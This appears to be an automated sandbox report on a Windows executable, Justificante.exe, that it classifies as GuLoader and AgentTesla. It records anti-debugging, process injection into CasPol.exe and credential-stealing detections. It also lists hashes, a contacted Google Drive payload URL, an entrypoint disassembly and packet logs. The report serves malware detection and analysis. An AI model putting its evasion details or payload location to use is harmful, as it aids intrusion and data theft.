            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\Justificante.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Justificante.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\Justificante.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1200000
            Source: C:\Users\user\Desktop\Justificante.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Justificante.exe"
            Source: CasPol.exe, 00000006.00000002.76588481923.0000000001D61000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CasPol.exe, 00000006.00000002.76588481923.0000000001D61000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: CasPol.exe, 00000006.00000002.76588481923.0000000001D61000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: CasPol.exe, 00000006.00000002.76588481923.0000000001D61000.00000002.00020000.sdmpBinary or memory string: `Program Manager
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: CasPol.exe, 00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmpBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7008, type: MEMORYSTR
            Source: Yara matchFile source: 00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7008, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7008, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential DumpingSecurity Software Discovery431Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSystem Information Discovery114SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

            Behavior Graph

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Justificante.exe54%VirustotalBrowse
            Justificante.exe49%ReversingLabsWin32.Trojan.GuLoader

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            http://www.topqualityfreeware.com/0%VirustotalBrowse
            http://www.topqualityfreeware.com/0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%VirustotalBrowse
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://topqualityfreeware.com0%Avira URL Cloudsafe
            http://tbLjUn.com0%Avira URL Cloudsafe
            https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.185.142
            truefalse
              high
              googlehosted.l.googleusercontent.com
              142.250.186.97
              truefalse
                high
                doc-14-48-docs.googleusercontent.com
                unknown
                unknownfalse
                  high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://doc-14-48-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0g7u5k11ld4lu4kfcj18c8hho068lo7a/1637666550000/11605847516605788748/*/1BlKZMF9MVJAQ4upDwXLe5aNIoHz7szu8?e=downloadfalse
                    high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1CasPol.exe, 00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://DynDns.comDynDNSCasPol.exe, 00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.topqualityfreeware.com/Justificante.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://doc-14-48-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0g7u5k11CasPol.exe, 00000006.00000003.75745983855.0000000001620000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.75750804342.0000000001619000.00000004.00000001.sdmpfalse
                      high
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://drive.google.com/CasPol.exe, 00000006.00000002.76587053720.0000000001598000.00000004.00000020.sdmpfalse
                        high
                        https://doc-14-48-docs.googleusercontent.com/CasPol.exe, 00000006.00000003.75745983855.0000000001620000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.75750804342.0000000001619000.00000004.00000001.sdmpfalse
                          high
                          https://drive.google.com/.fCasPol.exe, 00000006.00000002.76587053720.0000000001598000.00000004.00000020.sdmpfalse
                            high
                            http://topqualityfreeware.comJustificante.exefalse
                            • Avira URL Cloud: safe
                            unknown
                            https://doc-14-48-docs.googleusercontent.com/PCasPol.exe, 00000006.00000002.76587639424.000000000160B000.00000004.00000020.sdmpfalse
                              high
                              http://tbLjUn.comCasPol.exe, 00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://csp.withgoogle.com/csp/report-to/gse_l9ocaqCasPol.exe, 00000006.00000003.75745983855.0000000001620000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              142.250.185.142
                              drive.google.comUnited States
                              15169GOOGLEUSfalse
                              142.250.186.97
                              googlehosted.l.googleusercontent.comUnited States
                              15169GOOGLEUSfalse

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:527132
                              Start date:23.11.2021
                              Start time:12:20:03
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 5m 57s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:Justificante.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Number of analysed new started processes analysed:14
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@4/1@2/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 89%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe
                              • TCP Packets have been reduced to 100
                              • Excluded IPs from analysis (whitelisted): 20.82.19.171, 51.105.236.244
                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wdcpalt.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, ctldl.windowsupdate.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              12:22:46API Interceptor446x Sleep call for process: CasPol.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              No context

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              37f463bf4616ecd445d4a1937da06e19RtpLhZOyaf.exeGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              KkmuO2UfYt.exeGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              iIrI72Motw.exeGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              sBz6zVtsB1.exeGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              6599.doc.exeGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              6599.doc.exeGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              qTtykpVyaY.exeGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              mXLL1BHUQh.exeGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docxGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              Attachments msg.htmlGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              Potvrda narudzbe je u prilogu.exeGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              z5kXuxCnOa.exeGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              Clti.xlsxGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              Vernon.xlsxGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              EFT-11-22-201.htmlGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              #U266b_789_89676.htmGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              Sales Order List.exeGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              EVhIUVrKx8.exeGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142
                              #U0191ACTU#U0156A_gudqNItO_54357.vbsGet hashmaliciousBrowse
                              • 142.250.186.97
                              • 142.250.185.142

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Temp\~DFB5365E8046653CC1.TMP
                              Process:C:\Users\user\Desktop\Justificante.exe
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):32768
                              Entropy (8bit):4.01191323271951
                              Encrypted:false
                              SSDEEP:384:wcZ0tADSVlx6JQhynrV7Vr9wrCIM/ZUYVPzBAPN:wcZeADSV/6qhynrV7VxwrrMvqPN
                              MD5:6C4C01A4316CD9338DE51EC175EBF11D
                              SHA1:8C5D5B07E0ED6AAC72705F516E25BEAEA891EFA0
                              SHA-256:95876F7C1242672418DB201C02D70276EE9CC4345394DEAD3500619A39DA28F0
                              SHA-512:9F60729E865B0414DB4792F76465EDCE1595D22E884D01C07389A312474D1CE916E4CF73275D5AA0CB411D8EBB0617EF661CD10467AD838FD1B0B388C44823D5
                              Malicious:false
                              Reputation:low
                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):4.9473892426105825
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.15%
                              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:Justificante.exe
                              File size:192512
                              MD5:7b58393d3df51a592b86e85fedc61f33
                              SHA1:362eb5f69fa705ecdb51ca380ea77c78c4390a2d
                              SHA256:3ad96272b8dd2e5d39a8cd1131ce862e31c0953cefe68b9e2f372a4dadad6d76
                              SHA512:b2eb9e40ac7030bbf2e5f894e0c04eee58ffa86d9fbe7456f872d715f53e39f0cded36c3379c3375e846f8953d5cc5bdf31c8c50880b5d2ddaec3e1cf08ae2d4
                              SSDEEP:1536:tgetVCYyLGrMG5mbEEMfDz/nuUnVafzPta8NMrMN0yvDVXeJDM:tgejCYyLGrR5GQfnPuzxNMrc0yvhXeJ
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L......O.................0..........L........@....@........

                              File Icon

                              Icon Hash:0ceefedec6f67c0c

                              Static PE Info

                              General

                              Entrypoint:0x40134c
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                              DLL Characteristics:
                              Time Stamp:0x4FD09985 [Thu Jun 7 12:07:33 2012 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f27a613fda76c14f4eab7dc0085d799e

                              Entrypoint Preview

                              Instruction
                              push 00407F80h
                              call 00007F241C809DF3h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              inc eax
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ebx-56156F8Dh], bh
                              cmp eax, 1A9C49FDh
                              pop ebx
                              fstp dword ptr [ebx+004A3094h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              add dword ptr [ecx], eax
                              add dword ptr [ecx], eax
                              add dword ptr [ecx+ebp*2+76h], esp
                              imul esi, dword ptr [ebx+69h], 00736E6Fh
                              add dword ptr [ecx], eax
                              add dword ptr [ecx], eax
                              add dword ptr [ecx], eax
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              dec esp
                              xor dword ptr [eax], eax
                              add eax, ED97E1B3h
                              call 00007F23D3C6543Ah
                              adc byte ptr [ecx-26h], cl
                              mov bh, 2Fh
                              push edx
                              mov bl, C4h
                              cli
                              in eax, 8Eh
                              adc esi, eax
                              aad 42h
                              mov byte ptr [edx+1324908Bh], ch
                              or al, D3h
                              cmp cl, byte ptr [edi-53h]
                              xor ebx, dword ptr [ecx-48EE309Ah]
                              or al, 00h
                              stosb
                              add byte ptr [eax-2Dh], ah
                              xchg eax, ebx
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              nop
                              imul eax, dword ptr [eax], 0068B400h
                              add byte ptr [eax], al
                              or eax, dword ptr [eax]
                              push eax
                              inc ecx
                              push edx
                              inc ecx
                              inc esp
                              dec edi
                              dec ebx
                              push ebx
                              inc ecx
                              dec esp
                              inc ebp
                              add byte ptr [50001501h], cl
                              jc 00007F241C809E71h

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x236140x28.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x260000x90dd.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x100.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x22a6c0x23000False0.357205636161data5.11582163186IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .data0x240000x13f00x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .rsrc0x260000x90dd0xa000False0.346533203125data4.35489953686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountry
                              CUSTOM0x2e81f0x8beMS Windows icon resource - 1 icon, 32x32, 8 bits/pixelEnglishUnited States
                              INSTALL0x2d3a50x8beMS Windows icon resource - 1 icon, 32x32EnglishUnited States
                              INSTALL0x2cea20x503ISO-8859 text, with CRLF line terminatorsEnglishUnited States
                              SETUP0x2e5210x2feMS Windows icon resource - 1 icon, 32x32, 16 colorsEnglishUnited States
                              SETUP0x2dc630x8beMS Windows icon resource - 1 icon, 32x32EnglishUnited States
                              RT_ICON0x2bffa0xea8data
                              RT_ICON0x2b7520x8a8data
                              RT_ICON0x2b08a0x6c8data
                              RT_ICON0x2ab220x568GLS_BINARY_LSB_FIRST
                              RT_ICON0x2857a0x25a8dBase III DBT, version number 0, next free block index 40
                              RT_ICON0x274d20x10a8dBase III DBT, version number 0, next free block index 40
                              RT_ICON0x26b4a0x988dBase III DBT, version number 0, next free block index 40
                              RT_ICON0x266e20x468GLS_BINARY_LSB_FIRST
                              RT_GROUP_ICON0x2666c0x76data
                              RT_VERSION0x263a00x2ccdataTurkmenTurkmenistan

                              Imports

                              DLLImport
                              MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaVar2Vec, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                              Version Infos

                              DescriptionData
                              Translation0x0442 0x04b0
                              LegalCopyrightIdentiv
                              InternalNameTERRORREGIMENTE
                              FileVersion1.00
                              CompanyNameIdentiv
                              LegalTrademarksIdentiv
                              ProductNameIdentiv
                              ProductVersion1.00
                              FileDescriptionIdentiv
                              OriginalFilenameTERRORREGIMENTE.exe

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States
                              TurkmenTurkmenistan

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 23, 2021 12:22:34.913491011 CET49807443192.168.11.20142.250.185.142
                              Nov 23, 2021 12:22:34.913563967 CET44349807142.250.185.142192.168.11.20
                              Nov 23, 2021 12:22:34.913707972 CET49807443192.168.11.20142.250.185.142
                              Nov 23, 2021 12:22:34.933912039 CET49807443192.168.11.20142.250.185.142
                              Nov 23, 2021 12:22:34.933965921 CET44349807142.250.185.142192.168.11.20
                              Nov 23, 2021 12:22:34.987461090 CET44349807142.250.185.142192.168.11.20
                              Nov 23, 2021 12:22:34.987682104 CET49807443192.168.11.20142.250.185.142
                              Nov 23, 2021 12:22:34.990495920 CET44349807142.250.185.142192.168.11.20
                              Nov 23, 2021 12:22:34.990770102 CET49807443192.168.11.20142.250.185.142
                              Nov 23, 2021 12:22:35.169306040 CET49807443192.168.11.20142.250.185.142
                              Nov 23, 2021 12:22:35.169394970 CET44349807142.250.185.142192.168.11.20
                              Nov 23, 2021 12:22:35.170114994 CET44349807142.250.185.142192.168.11.20
                              Nov 23, 2021 12:22:35.170304060 CET49807443192.168.11.20142.250.185.142
                              Nov 23, 2021 12:22:35.175195932 CET49807443192.168.11.20142.250.185.142
                              Nov 23, 2021 12:22:35.215912104 CET44349807142.250.185.142192.168.11.20
                              Nov 23, 2021 12:22:35.650759935 CET44349807142.250.185.142192.168.11.20
                              Nov 23, 2021 12:22:35.651041985 CET49807443192.168.11.20142.250.185.142
                              Nov 23, 2021 12:22:35.651104927 CET44349807142.250.185.142192.168.11.20
                              Nov 23, 2021 12:22:35.651248932 CET49807443192.168.11.20142.250.185.142
                              Nov 23, 2021 12:22:35.651283979 CET44349807142.250.185.142192.168.11.20
                              Nov 23, 2021 12:22:35.651343107 CET44349807142.250.185.142192.168.11.20
                              Nov 23, 2021 12:22:35.651427984 CET49807443192.168.11.20142.250.185.142
                              Nov 23, 2021 12:22:35.651480913 CET49807443192.168.11.20142.250.185.142
                              Nov 23, 2021 12:22:35.710139990 CET49807443192.168.11.20142.250.185.142
                              Nov 23, 2021 12:22:35.710202932 CET44349807142.250.185.142192.168.11.20
                              Nov 23, 2021 12:22:35.795238018 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:35.795317888 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:35.795553923 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:35.795881033 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:35.795934916 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:35.850466967 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:35.850677013 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:35.853480101 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:35.853770971 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:35.857368946 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:35.857414007 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:35.858040094 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:35.858222008 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:35.863606930 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:35.903901100 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.139142990 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.139379025 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.139465094 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.139622927 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.139659882 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.139674902 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.140192986 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.140440941 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.140511990 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.141753912 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.142040014 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.142101049 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.142349958 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.143990993 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.144383907 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.146950006 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.147205114 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.150104046 CET44349808142.250.186.97192.168.11.20
                              Nov 23, 2021 12:22:36.150304079 CET49808443192.168.11.20142.250.186.97
                              Nov 23, 2021 12:22:36.150353909 CET44349808142.250.186.97192.168.11.20
